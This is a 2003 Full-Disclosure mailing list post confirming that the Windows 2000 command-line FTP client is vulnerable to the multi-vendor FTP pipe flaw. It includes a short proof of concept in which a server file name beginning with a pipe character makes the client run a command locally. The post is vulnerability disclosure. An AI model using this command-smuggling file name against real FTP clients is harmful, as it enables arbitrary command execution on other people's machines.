[Full-Disclosure] RE: Multiple Vendor FTP pipe Vulnerability

From: SChoe (schoeat_private)
Date: Tue Feb 25 2003 - 14:17:50 PST

    Securityfocus has a post on its website regarding this vulnerability in
    many ftp clients.  I've tested and subsequently validated this issue on
    many of the platforms mentioned in their advisory.  They mention
    that the Netscape client on Windows 2000 Professional, but fails to
    mention that the commandline ftp client included with win2k (server and
    pro) are also vulnerable.

    <-----------------------snip----------------------->
    # Create file on ftp server for download by client.
    schoe@ftp:/home/ftp$ touch \|touch\ file

    # Start commandline ftp client on win2k.
    Microsoft Windows 2000 [Version 5.00.2195]
    <C> Copyright 1985-2000 Microsoft Corp.

    C:\ ftp ftp.xxxx.com
    ftp> get "|touch file.txt"
    ftp> quit
    221 Goodbye.

    # "C:\file.txt" should now exist.
    <-----------------------snap----------------------->

    Multiple Vendor VTP pipe Vulnerability
    ======================================
    www.securityfocus.com/bid/396/info

    | Sung J. Choe <schoe[at]oicinc.com>, TICSA |
    | Systems Admin, Facility Security Officer  |
                | Oceanic Imaging Consultants, Inc. |
                | Phone #: (808) 539.3634           |

    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html